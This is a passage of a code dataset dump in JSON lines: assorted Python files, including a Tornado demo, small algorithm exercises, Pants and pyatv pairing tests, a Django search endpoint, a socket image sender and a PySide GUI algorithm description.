= words.filter(\n lambda document_page_word: document_page_word[2] in search_words)\n\n words_and_context = filtered_words.map(\n lambda document_page_word:\n (document_page_word[2],\n {\"title\": document_page_word[0].title,\n \"place\": document_page_word[0].place,\n \"publisher\": document_page_word[0].publisher,\n \"page\": document_page_word[1].code,\n \"text\": document_page_word[1].content,\n \"year\": document_page_word[0].year}))\n\n result = words_and_context \\\n .groupByKey() \\\n .map(lambda word_context:\n (word_context[0], list(word_context[1]))) \\\n .collect()\n return result\n","sub_path":"defoe/alto/queries/find_words_context_group_by_word.py","file_name":"find_words_context_group_by_word.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215247700","text":"import tornado.ioloop # 核心io循环模块,封装linux的epoll和BSD的kqueue, tornado高性能处理的核心。\nimport tornado.web # tornado的基础web框架\nimport tornado.httpserver # httpserver监听端口\nimport tornado.options\nfrom tornado.options import define, options\n\n#定义端口配置\ndefine('port', type=int, default=8080)\n\n#创建视图\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"

hello,world

\")\n\n#创建路由表\nurls = [\n (r\"/\", MainHandler),\n (r'/index',MainHandler)\n]\n\n#创建配置-开启调试模式\nconfigs = dict(debug=True)\n\n#自定义应用\nclass MyApplication(tornado.web.Application):\n def __init__(self, urls, configs):\n super(MyApplication, self).__init__(handlers=urls, **configs)\n\n#创建服务器\ndef make_app():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(MyApplication(urls,configs))\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.current().start()\n\n#启动服务器\nif __name__ == '__main__':\n make_app()\n","sub_path":"7_Demo_Tornado/2_Tornado_Code/1_Tornado_FirstApp/1_Tornado_urls.py","file_name":"1_Tornado_urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398302311","text":"#!/usr/bin/python3\nfrom sys import stdin\n\ndef max_len (prefix, n):\n for i in range (1, n + 1):\n prefix [i] += prefix [i - 1]\n indices = list (range (n + 1))\n indices.sort (key = lambda x: prefix [x])\n min_val = float (\"inf\")\n cnt = 0\n ans = 0\n for i in indices:\n nans = i - min_val\n if ans < nans:\n cnt = 1\n ans = nans\n elif ans == nans: cnt += 1\n min_val = i if i < min_val else min_val\n if cnt: print (ans, cnt)\n else: print (-1)\n\ndef main ():\n read = stdin.readline\n n = int (read ())\n a = [0] + list (map (int, read ().split ()))\n max_len (a, n)\n\nif __name__ == \"__main__\": main ()\n","sub_path":"_mehta_and_subarrays.py","file_name":"_mehta_and_subarrays.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"30480478","text":"#________________________________________________\n#Inches to Feet converter\n#Author: Andrew Simonson and Natheniel Goldstien\n#________________________________________________\n\n\n#Get input\nininches = input(\"input your height in inches\")\n#Convert string to float\ninches = float(ininches)\n#Find number of feet total\nNumOfFeet = int(inches // 12)\n#Find remainder of inches\nNumOfInches = inches - (NumOfFeet * 12)\nprint(\"You are\" , NumOfFeet , \"feet and\" , NumOfInches , \"inches tall.\")\n\n\n\n\n","sub_path":"AP-CSP (Python)/InchesToFeet.py","file_name":"InchesToFeet.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534061193","text":"from datetime import datetime\r\nfrom termcolor import colored\r\n\r\nclass Spy:\r\n\r\n def __init__(self, name, salutation, age, rating):\r\n self.name = name\r\n self.salutation = salutation\r\n self.age = age\r\n self.rating = rating\r\n self.is_online = True\r\n self.chats = []\r\n self.current_status_message = None\r\n self.chats_avg = [0, 0]\r\n\r\n\r\nclass ChatMessage:\r\n\r\n def __init__(self,message,sent_by_me):\r\n self.message = message\r\n self.time = datetime.now()\r\n self.sent_by_me = sent_by_me\r\n\r\nspy = Spy('riya', 'Ms.', 24, 4)\r\n\r\nfriend_1 = Spy('Ishu', 'Mr.', 20, 7)\r\nfriend_2 = Spy('Neha', 'Ms.', 19, 2)\r\nfriend_3 = Spy('Shikha', 'Ms.',20, 3)\r\nfriend_4=Spy('Kirti','Ms.',20,8)\r\n\r\n\r\nfriends = [friend_1, friend_2, friend_3,friend_4]","sub_path":"spy_details.py","file_name":"spy_details.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"165799705","text":"import math\r\ndef judge(list):\r\n#X表示半径,L表示油量,Z表示圆心角\r\n for vari in list:\r\n X = int(vari[0])\r\n L = int(vari[1])\r\n Z = int(vari[2])\r\n if Z > 180:\r\n Z = 360 - Z\r\n else:\r\n Z = Z\r\n Oil = int(L) * 5\r\n #print(type(Oil))\r\n if Oil >= int(Z) * math.pi * int(X) * 2 / 180:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\na = int(input())\r\nvarilist = []\r\nfor b in range(a):\r\n vari = input().split()\r\n varilist.append(vari)\r\n#print(varilist)\r\njudge(varilist)\r\n\r\n'''\r\n有一条圆形公路,半径为X个单位。Noder的家在这条公路上,\r\n有一个超市也在这条公路上。家和超市所形成的圆心角为Z度。\r\n现在车子上有L升油,一升油能开5个单位的路程。\r\n问Noder用这L升油能不能先从家开到超市购物,然后再从超市回家。\r\n\r\n条件题,需要注意的是当圆心角大于180度时车子是逆时针行走,\r\n需要将圆心角转成小于180度\r\n而且是往返,注意路程要乘2\r\nInput:\r\n2\r\n1 100 0\r\n10 0 1\r\nOutput:\r\nYES\r\nNO\r\n'''","sub_path":"基础题/1916购物.py","file_name":"1916购物.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190447245","text":"# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport os\nfrom textwrap import dedent\n\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.build_graph.build_file_aliases import BuildFileAliases\nfrom pants.build_graph.target import Target\nfrom pants_test.jvm.jvm_tool_task_test_base import JvmToolTaskTestBase\n\nfrom pants.contrib.spindle.targets.spindle_thrift_library import SpindleThriftLibrary\nfrom pants.contrib.spindle.tasks.spindle_gen import SpindleGen\n\n\nclass SpindleGenTest(JvmToolTaskTestBase):\n @classmethod\n def task_type(cls):\n return SpindleGen\n\n @property\n def alias_groups(self):\n return BuildFileAliases(\n targets={\n 'spindle_thrift_library': SpindleThriftLibrary,\n 'jar_library': JarLibrary,\n 'target': Target,\n },\n objects={\n 'jar': JarDependency,\n })\n\n def test_smoke(self):\n contents = dedent(\"\"\"namespace java org.pantsbuild.example\n struct Example {\n 1: optional i64 number\n }\n \"\"\")\n\n self.create_file(relpath='test_smoke/a.thrift', contents=contents)\n\n self.add_to_build_file('3rdparty', dedent(\"\"\"\n jar_library(\n name = 'spindle-runtime',\n jars = [\n jar(org = 'com.foursquare', name = 'spindle-runtime_2.10', rev = '3.0.0-M7'),\n ],\n )\n \"\"\"\n ))\n\n self.make_target(spec='test_smoke:a',\n target_type=SpindleThriftLibrary,\n sources=['a.thrift'])\n\n target = self.target('test_smoke:a')\n context = self.context(target_roots=[target])\n\n task = self.execute(context)\n\n build_path = os.path.join(task.workdir,\n 'src',\n 'jvm',\n 'org',\n 'pantsbuild',\n 'example')\n\n java_exists = os.path.isfile(os.path.join(build_path, 'java_a.java'))\n scala_exists = os.path.isfile(os.path.join(build_path, 'a.scala'))\n self.assertTrue(java_exists)\n self.assertTrue(scala_exists)\n","sub_path":"contrib/spindle/tests/python/pants_test/contrib/spindle/tasks/test_spindle_gen.py","file_name":"test_spindle_gen.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475746932","text":"import socket\nimport cv2\nimport numpy\n\nfrom threading import Thread\nfrom subprocess import call\n\nSIZE_LEN = 10\n\n### Error fixing consts ###\nREQUEST_SHOT_MSG = \"please take photo\"\nMOVE_MSG = \"move\"\nRIGHT = \"0\"\nLEFT = \"1\"\nCLOSE = \"close\"\n\nLAPTOP_IP = '192.168.43.185'\nGATEWAY = '192.168.43.1'\nSUBNET_MASK = '255.255.255.0'\nSEND_TIMEOUT = 20.0 #seconds\nLISTEN_TIMEOUT = 1000.0\nIM_SIZE = 8192000\nSENDER = True\nLISTENER = False\nPORT = 5000\n\"\"\"\nThis class provides sender and receiver TCP services,\nsender is nonblocking while receiver obviously is.\n\"\"\"\nclass connection:\n\n def __init__(self, type, port=PORT):\n while True:\n try:\n if(type == SENDER):\n self.timeout = SEND_TIMEOUT\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(self.timeout)\n s.connect((LAPTOP_IP, port))\n print(\"Connected to GUI!\")\n self.socket = s\n else:\n ## fix ip ##\n # call(\"netsh interface ip set address name=\\\"Wireless \"\n # \"Network\"\n # \"Connection 2\\\" static \" +LAPTOP_IP + \" \" +\n # SUBNET_MASK + \" \" + GATEWAY)\n self.timeout = LISTEN_TIMEOUT\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((\"\", port))\n self.sock = s\n self.sock.settimeout(self.timeout)\n self.sock.listen(1)\n sender, address = self.sock.accept()\n print(\"Successfully connected to pi: \", address)\n self.socket = sender\n break\n except:\n a=0\n #print(\"Failed to connect to GUI!\")\n self.thread = None\n\n def send_image(self, img):\n def really_send(img):\n try:\n self.socket.settimeout(SEND_TIMEOUT)\n str_encode = cv2.imencode('.jpg', img)[1].tostring()\n print('sending img message of size ' + str(len(str_encode)))\n self.send_data(str_encode)\n except:\n print(\"failed to send image <:-(\")\n\n if not self.thread==None:\n self.thread.join()\n\n self.thread = Thread(target = really_send, args = (img,))\n self.thread.start()\n\n def send_msg(self, msg):\n def really_send(msg):\n try:\n self.socket.settimeout(SEND_TIMEOUT)\n self.send_data(msg.encode())\n except:\n print(\"failed to send msg <:-(\")\n\n if not self.thread == None:\n self.thread.join()\n\n self.thread = Thread(target=really_send, args=(msg,))\n self.thread.start()\n\n def get_image(self):\n self.socket.settimeout(LISTEN_TIMEOUT)\n while True:\n msg = self.recv_data()\n decoded = numpy.fromstring(msg,numpy.uint8)\n img = cv2.imdecode(decoded,\n cv2.IMREAD_COLOR)\n if not (img is None):\n return img\n\n def get_msg(self):\n self.socket.settimeout(LISTEN_TIMEOUT)\n while True:\n msg = str(self.recv_data())\n if not (msg is None):\n return msg\n\n\n def send_data(self, data):\n datalen = str(len(data)).ljust(SIZE_LEN)\n data_final = datalen.encode()+data\n len_sent = 0\n while len_sent bytes:\n \"\"\"\n convert data to bytes\n mask - some mask to be applied on marshaled data\n \"\"\"\n c = Coder(data, random=random)\n c.magic()\n if mask is None:\n return c.export()\n else:\n data = c.export()\n return bytes([data[i] ^ mask[i % len(mask)] for i in range(len(data))])\n\n\ndef unmarshal(data: bytes=None, fd=None, mask: bytes=None) -> Any:\n \"\"\"\n convert data as bytes() or from fd {interface : read() }\n \"\"\"\n if data is None and fd is None:\n raise ValueError('Expected param \"data\" of \"fd\"')\n if data is not None and all(map(lambda x: not isinstance(data, x), {bytes, str})):\n raise ValueError(f'Unexpected type of \"data\" ({type(data)}), expected bytes or str')\n return Parser(\n mask=mask,\n fd=fd,\n data=data\n ).magic().export()\n","sub_path":"k2/utils/art/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"57422529","text":"import jsonpickle\n\nimport tools.file_management as file_management\n\nfrom App.scene_container import SceneContainer\n\n\nclass Thing:\n def __init__(self, value):\n self.v = value\n\n\ndef main():\n obj = Thing([\"a\", 1, 1.2123231, complex(1, 1), [1, 0, 0]])\n # open_4_unique_save\n # , note = \"test\"\n # open()\n # Нужно снчала написать через функцию\n note = \"test\"\n with file_management.open_4_unique_save(\"test.json\", mode=\"w\", note=note) as file:\n pickled = jsonpickle.encode(obj, make_refs=True, indent=4)\n file.write(pickled)\n print(f\"file is {'not ' if not file.closed else ''}closed\")\n\n\ndef trace_load():\n file_name = r\"D:\\Projects\\Python\\Raytracing\\saves\\2021\\09\\16\\17_43_54_efficiency_divergen_angle\\(1_ 1,01).json\"\n d = SceneContainer.load_json_to_dict(file_name)\n pretty = SceneContainer.get_readable_str_data_from_dict(d)\n print(pretty)\n\n\nif __name__ == '__main__':\n # main()\n trace_load()\n","sub_path":"scripts/testing/file_saves_test.py","file_name":"file_saves_test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323970105","text":"\"\"\"Test suit for pairing process with Apple TV.\"\"\"\n\nimport asynctest\nimport ipaddress\n\nfrom pyatv import conf\nfrom pyatv.dmap import (pairing, parser, tag_definitions)\nfrom tests import zeroconf_stub, utils\n\n\nREMOTE_NAME = 'pyatv remote'\n\n# This is a valid config for default pairing guid\nPIN_CODE = 1234\nPAIRING_GUID = '0x0000000000000001'\nPAIRING_CODE = '690E6FF61E0D7C747654A42AED17047D'\n\n# This is valid for a some other (non-default) config\nPIN_CODE2 = 5555\nPAIRING_GUID2 = '0x1234ABCDE56789FF'\nPAIRING_CODE2 = '58AD1D195B6DAA58AA2EA29DC25B81C3'\n\n# Code is padded with zeros\nPIN_CODE3 = 1\nPAIRING_GUID3 = '0x7D1324235F535AE7'\nPAIRING_CODE3 = 'A34C3361C7D57D61CA41F62A8042F069'\n\n# Pairing guid is 8 bytes, which is 64 bits\nRANDOM_128_BITS = 6558272190156386627\nRANDOM_PAIRING_GUID = '0x5B03A9CF4A983143'\nRANDOM_PAIRING_CODE = '7AF2D0B8629DE3C704D40A14C9E8CB93'\n\n\nclass PairingTest(asynctest.TestCase):\n\n async def setUp(self):\n self.service = conf.DmapService(None, None)\n self.config = conf.AppleTV('Apple TV', '127.0.0.1')\n self.config.add_service(self.service)\n self.zeroconf = zeroconf_stub.stub(pairing)\n self.pairing = None\n\n # TODO: currently stubs internal method, should provide stub\n # for netifaces later\n pairing._get_private_ip_addresses = \\\n lambda: [ipaddress.ip_address('10.0.0.1')]\n\n async def tearDown(self):\n await self.pairing.finish()\n\n async def _start(self,\n pin_code=PIN_CODE,\n pairing_guid=PAIRING_GUID,\n name=REMOTE_NAME):\n options = {'zeroconf': self.zeroconf}\n if pairing_guid:\n options['pairing_guid'] = pairing_guid\n if name:\n options['name'] = name\n\n self.pairing = pairing.DmapPairingHandler(\n self.config, None, self.loop, **options)\n await self.pairing.begin()\n self.pairing.pin(pin_code)\n\n async def test_zeroconf_service_published(self):\n await self._start()\n\n self.assertEqual(len(self.zeroconf.registered_services), 1,\n msg='no zeroconf service registered')\n\n service = self.zeroconf.registered_services[0]\n self.assertEqual(service.properties[b'DvNm'], REMOTE_NAME,\n msg='remote name does not match')\n\n async def test_succesful_pairing(self):\n await self._start()\n\n url = self._pairing_url(PAIRING_CODE)\n data, _ = await utils.simple_get(url)\n\n await self.pairing.finish()\n\n # Verify content returned in pairingresponse\n parsed = parser.parse(data, tag_definitions.lookup_tag)\n self.assertEqual(parser.first(parsed, 'cmpa', 'cmpg'), 1)\n self.assertEqual(parser.first(parsed, 'cmpa', 'cmnm'), REMOTE_NAME)\n self.assertEqual(parser.first(parsed, 'cmpa', 'cmty'), 'iPhone')\n\n self.assertEqual(self.service.credentials, PAIRING_GUID)\n\n async def test_successful_pairing_random_pairing_guid_generated(self):\n pairing.random.getrandbits = lambda x: RANDOM_128_BITS\n\n await self._start(pairing_guid=None)\n\n url = self._pairing_url(RANDOM_PAIRING_CODE)\n await utils.simple_get(url)\n\n await self.pairing.finish()\n\n self.assertEqual(self.service.credentials, RANDOM_PAIRING_GUID)\n\n async def test_succesful_pairing_with_any_pin(self):\n await self._start(pin_code=None)\n\n url = self._pairing_url('invalid_pairing_code')\n _, status = await utils.simple_get(url)\n\n self.assertEqual(status, 200)\n\n async def test_succesful_pairing_with_pin_leadering_zeros(self):\n await self._start(pin_code=PIN_CODE3, pairing_guid=PAIRING_GUID3)\n\n url = self._pairing_url(PAIRING_CODE3)\n _, status = await utils.simple_get(url)\n\n self.assertEqual(status, 200)\n\n async def test_pair_custom_pairing_guid(self):\n await self._start(pin_code=PIN_CODE2, pairing_guid=PAIRING_GUID2)\n\n url = self._pairing_url(PAIRING_CODE2)\n data, _ = await utils.simple_get(url)\n\n await self.pairing.finish()\n\n # Verify content returned in pairingresponse\n parsed = parser.parse(data, tag_definitions.lookup_tag)\n self.assertEqual(parser.first(parsed, 'cmpa', 'cmpg'),\n int(PAIRING_GUID2, 16))\n\n self.assertEqual(self.service.credentials, PAIRING_GUID2)\n\n async def test_failed_pairing(self):\n await self._start()\n\n url = self._pairing_url('wrong')\n _, status = await utils.simple_get(url)\n\n self.assertEqual(status, 500)\n\n def _pairing_url(self, pairing_code):\n service = self.zeroconf.registered_services[0]\n server = 'http://127.0.0.1:{}'.format(service.port)\n return '{}/pairing?pairingcode={}&servicename=test'.format(\n server, pairing_code)\n","sub_path":"tests/dmap/test_pairing.py","file_name":"test_pairing.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262199023","text":"def largestArea(arr,n)->int:\r\n res = 0\r\n ps = [0]*n\r\n ns = [0]*n\r\n stack = []\r\n stack.append(0)\r\n for i in range(n):\r\n if (len(stack) > 0) and arr[stack[-1]]>=arr[i]:\r\n stack.pop()\r\n if len(stack) > 0:\r\n ps[i] = stack[-1]\r\n else:\r\n ps[i] = -1\r\n stack.append(i)\r\n \r\n stack = []\r\n stack.append(n-1)\r\n for i in range(n-1,-1,-1):\r\n if (len(stack) > 0) and arr[stack[-1]]>=arr[i]:\r\n stack.pop()\r\n if len(stack) > 0:\r\n ns[i] = stack[-1]\r\n else:\r\n ns[i] = n\r\n stack.append(i)\r\n for i in range(n):\r\n curr = arr[i]\r\n curr += (i-1-ps[i])*arr[i]\r\n curr += (ns[i]-i-1)*arr[i]\r\n res = max(curr,res)\r\n \r\n return res\r\n \r\n \r\ndef maximalRectangle(matrix) -> int:\r\n \r\n row = len(matrix)\r\n col = len(matrix[0])\r\n for i in range(row):\r\n for j in range(col):\r\n matrix[i][j] = int(matrix[i][j])\r\n res = largestArea(matrix[0],col)\r\n for i in range(1,row):\r\n for j in range(col):\r\n if(matrix[i][j] == 1):\r\n matrix[i][j] += matrix[i-1][j]\r\n res = max(res,largestArea(matrix[i],col))\r\n return res\r\n\r\n\r\nmatrix = [[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]\r\n\r\nprint(maximalRectangle(matrix))","sub_path":"stack/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181330523","text":"from opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy import Column\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nclass AddOrgRoleParticipations(SchemaMigration):\n \"\"\"Add OrgRole participations.\n \"\"\"\n\n def migrate(self):\n self.make_contact_id_nullable()\n\n self.add_participation_type()\n self.insert_contact_participation_type()\n self.make_participation_type_non_nullable()\n\n self.add_org_role_participation()\n\n def make_contact_id_nullable(self):\n self.op.alter_column('participations', 'contact_id',\n nullable=True,\n existing_type=Integer)\n\n def add_participation_type(self):\n self.op.add_column(\n 'participations',\n Column('participation_type', String(30), nullable=True))\n\n def insert_contact_participation_type(self):\n participation_table = table(\n 'participations', column('participation_type'))\n\n self.execute(participation_table.update().values(\n participation_type='contact_participation'))\n\n def make_participation_type_non_nullable(self):\n self.op.alter_column('participations', 'participation_type',\n existing_type=String(30), nullable=False)\n\n def add_org_role_participation(self):\n self.op.add_column(\n 'participations',\n Column('org_role_id', Integer, ForeignKey('org_roles.id')))\n","sub_path":"opengever/contact/upgrades/20160824101726_add_org_role_participations/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"424426229","text":"# NOTE: Decided it was best to keep AJAX calls app-separated\nimport ujson as json\nfrom django.http import HttpResponse, HttpResponseServerError\nimport re\n\n# from django.contrib.auth.models import Group\n#\n# from haystack.query import SearchQuerySet\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Kind of a weird import, probably should have a utils file or something\nfrom .views import get_search_queryset_with_permissions\nimport html\n\n\ndef main(request):\n \"\"\"Default to Server Error\"\"\"\n return HttpResponseServerError()\n\n\ndef fetch_global_search_suggestions(request):\n \"\"\"Return global search suggestions in JSON\n\n Receives the following from POST:\n text - The text the user has entered thus far into the search bar\n \"\"\"\n data = []\n\n # Pattern for removing non-alphanumeric\n regex_pattern = re.compile('[\\W_]+', re.UNICODE)\n\n # Get text from request\n # Only takes alphanumeric at the moment\n text = regex_pattern.sub(' ', request.POST.get('text', ''))\n\n # Filter on group: either get all with no group or those with a group the user has\n sqs = get_search_queryset_with_permissions(request)\n\n suggestions = sqs.autocomplete(text=text)\n # At the moment, I just take the first ten results\n for suggestion in suggestions[:10]:\n # data.append(suggestion.suggestion)\n data.append({\n 'label': html.unescape(suggestion.text.split('\\n')[0]),\n 'value': html.unescape(suggestion.text.split('\\n')[1])\n })\n\n return HttpResponse(json.dumps(data),\n content_type=\"application/json\")\n\nswitch = {\n 'fetch_global_search_suggestions': fetch_global_search_suggestions,\n}\n\n\ndef ajax(request):\n \"\"\"Switch to correct function given POST call\n\n Receives the following from POST:\n call -- What function to redirect to\n \"\"\"\n post_call = request.POST.get('call', '')\n\n if not post_call:\n logger.error('post_call not present in request to ajax')\n return HttpResponseServerError\n\n # Abort if there is no valid call sent to us from Javascript\n if not post_call:\n return main(request)\n\n # Route the request to the correct handler function\n # and pass request to the functions\n try:\n # select the function from the dictionary\n procedure = switch[post_call]\n\n # If all else fails, handle the error message\n except KeyError:\n return main(request)\n\n else:\n # execute the function\n return procedure(request)\n","sub_path":"mps/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560934107","text":"#!/usr/bin/env python\n\"\"\"\nName: Craig Opie\nClass: CENT110\nFile: project1.py\n\nAlgorithm:\n1) Add support for PySide and PySide2:\n a. Import required modules from PySide.\n b. Port the PySide.QtGui as QtWidgets to support the code written in PySide2.\n c. If PySide is not installed:\n d. Import required modules from PySide2.\n2) Import the sys module.\n3) Create a class(object) named MyGui using the properties of the object from PySide, QMainWindow.\n4) Define the function '__init__' (standard library) for initiation of the object importing any properties of the object itself (from here on referenced as self).\n a. Setup the Main Dialog Box 'self' properties:\n 1. Execute the initiation of the object QMainWindow from PySide.\n 2. Create a new instance of the object 'QTextEdit' in self and name it 'text'.\n 3. Make it so that 'text' is read only.\n 4. Make 'text' fill the dialog box as the central widget.\n 5. Make the Main Dialog Box (self) 250x250 pixels away from the upper left corner of the screen and 700x400 pixels large.\n 6. Make the title in the uppermost portion of 'self' read \"Craig Opie - Project 1\".\n 7. Create 'self' as a Dialog Box and make it visible.\n b. Establish 'self' wide variables (simular to Public for other languages).\n 1. 'allPriceList' as a list for all prices.\n 2. 'appPriceList' as a list for appetizer prices.\n 3. 'entreePriceList' as a list for entree prices.\n 4. 'dessertPriceList' as a list for dessert prices.\n 5. 'otherPriceList' as a list for all other items' prices.\n 6. 'data_' as a string containing the xml header information and formatting.\n 7. 'closingData' as a string for the closing information that will be added after content.\n 8. 'finalData' as a string for combining the 'data_' and 'closingData' strings.\n 9. 'itemList' as a string that will be split into a list of items.\n 10. 'splitData' as a string from the user input that will be split.\n 11. 'foodBox' as a string that will contain the text from the widget 'foodBox'.\n 12. 'typeBox' as a string that will contain the text from the widget 'typeBox'.\n 13. 'typeBoxString' as a string that will contain the properly formatted information in 'typeBox' used for comparison operations.\n 14. 'priceBox' as a float that will contain the value from the widget 'priceBox'.\n 15. 'max_price' as a float that will contain the highest price of all the items.\n 16. 'min_price' as a float that will contain the lowest price of all the items.\n5) Define a function called 'initMenu' for 'self' that will create a menu bar on Main Dialog Box.\n a. Create a new instance of the object 'menuBar' from PySide.\n b. Create a new instance of a 'menuBar' function called 'addMenu' where we define 'file'.\n c. Add the following items to the 'file' in 'menuBar':\n 1. Create a new selectable object named 'addItem' which displays \"Add Item\".\n 2. If 'addItem' is selected perform the function 'addItem' in 'self'.\n 3. Display the object 'addItem' in the 'menuBar' under 'file'.\n 4. Create a new selectable object named 'save_' which displays \"Save\".\n 5. If 'addItem' is selected perform the function 'saveFile' in 'self'.\n 6. Display the object 'save_' in the 'menuBar' under 'file'.\n 7. Create a new selectable object named 'open_' which displays \"Open\".\n 8. If 'addItem' is selected perform the function 'openFile' in 'self'.\n 9. Display the object 'open_' in the 'menuBar' under 'file'.\n 10. Create a new selectable object named 'quit_' which displays \"Quit\".\n 11. If 'addItem' is selected perform the function 'quitFile' in 'self'.\n 12. Display the object 'quit_' in the 'menuBar' under 'file'.\n6) Define a function called 'saveFile' for 'self' that will allow the user to save the information in 'text' to a plain text file format.\n a. Appends user input into a string with pre-selected split identifiers to sort into prepare the data to be split.\n 1. Split 'splitData' anywhere \"\\n\" is present and append line to 'itemList'.\n 2. For eachline in 'itemList':\n i. Split 'itemList' anywhere \"|\" is present and append items to a list named 'items'.\n ii. Append str(\"\\n \") to 'data_'.\n iii.Append str(\"\\n 'items[0]'\") to 'data_'.\n iv. Append str(\"\\n 'items[1]''items[2]'\") to 'data_'.\n vi. Append str(\"\\n \") to 'data_'.\n b. Append the closing tags and final mxl data to 'closingData'.\n 1. Append str(\"\\n 'overallAvg'\") to 'closingData'.\n 2. Append str(\"\\n 'appAvg'\") to 'closingData'.\n 3. Append str(\"\\n 'entreeAvg'\") to 'closingData'.\n 4. Append str(\"\\n 'dessertAvg'\") to 'closingData'.\n 5. Append str(\"\\n 'otherAvg'\") to 'closingData'.\n 6. Append str(\"\\n \")\n 7. Append str(\"\\n 'max_price'\") to 'closingData'.\n 8. Append str(\"\\n 'min_price'\") to 'closingData'.\n 9. Append str(\"\\n \") to 'closingData'.\n 10. Append str(\"\\n\") to 'closingData'.\n c. Concatenate 'startData' + 'userData' + 'closingData' and assign to 'finalData'.\n d. Open a save file dialog box and allow the user to select location and name for the file.\n e. If the user specifies a filename:\n 1. Create a new document with write abilities and assign it to the variable 'outfile'.\n 2. Create a new variable 'contents' and assign the text stored in 'text'.\n 3. Write the value of 'contents' to 'outfile'.\n 4. Close 'outfile'.\n7) Define a function called 'openFile' for 'self' that will allow the user to open the information in a plain text file and display in 'text'.\n a. Open an open file dialog box and allow the user to select location and name for the file.\n b. If the user specifies a filename:\n 1. Open the document with read abilities and assign it to the variable 'infile'.\n 2. Create a new variable 'contents' and assign the text stored in 'infile'.\n 3. Write the value of 'contents' to 'text'.\n 4. Close 'infile'.\n8) Define a function called 'addFile' for 'self' that will open a Child Dialog Box for the user to enter values to be stored in an xml file.\n a. Setup the Child Dialog Box properties.\n 1. Create a new instance of QDialog for 'self' named 'myDialog'.\n 2. Set 'myDialog' title to display \"Enter Data\".\n 3. Set 'myDialog' to open 350x350 pixels away from the top left corner of the screen and 400x200 pixels large.\n 4. Create a new instance of 'QGridLayout' named 'layout'.\n 5. Set 'myDialog' to use 'layout'.\n b. Create a first row of widgets for user input.\n 1. Create a label named 'labelFood' that contains the text \"Enter Food\".\n 2. Place 'labelFood' in the first column on the first row.\n 3. Create a text box named 'foodBox' that allows the user to input text.\n 4. Place 'foodBox' in the second column on the first row.\n 5. Assign 'foodBox' text to the 'self' variable 'foodBox'.\n c. Create a second row of widgets for user input.\n 1. Create a label named 'labelType' that contains the text \"Enter Type\".\n 2. Place 'labelType' in the first column on the second row.\n 3. Create a text box named 'typeBox' that allows the user to input text.\n 4. Place 'typeBox' in the second column on the first row.\n 5. Assign 'typeBox' text to the 'self' variable 'typeBox'.\n d. Create a third row of widgets for user input.\n 1. Create a label named 'labelPrice' that contains the text \"Enter Price\".\n 2. Place 'labelPrice' in the first column on the third row.\n 3. Create a text box named 'priceBox' that allows the user to input text.\n 4. Place 'priceBox' in the second column on the third row.\n 5. Assign 'priceBox' text to the 'self' variable 'priceBox'.\n e. Creates a third column for buttons that are styled for the user.\n 1. Create an instance of 'QDialogButtonBox' named 'buttons'.\n 2. Set the orientation of 'buttons' to be vertical.\n 3. Create a button with the text \"Add\" and assign it the role of accepted.\n 4. Create a button with the text \"Cancel\" and assign it the role of reject.\n 5. Connect the rejected role to the close function.\n 6. Connect the accepted role to the 'appendList' function of 'self'.\n 7. Change the button layout to be centered vertically and horizontally, spanned over the three rows.\n f. Execute the above code and create the Child Dialog Box to see.\n9) Define a function called 'appendList' for 'self' that will take the information from the user input append it to a string, split the string into a list, add items from the list to a string in xml format, and set the Main Dialog Box 'text' to be a new xml string.\n a. If there are previous entries from the user:\n 1. Compare 'priceBox' and 'max_price' and store the larger amount in 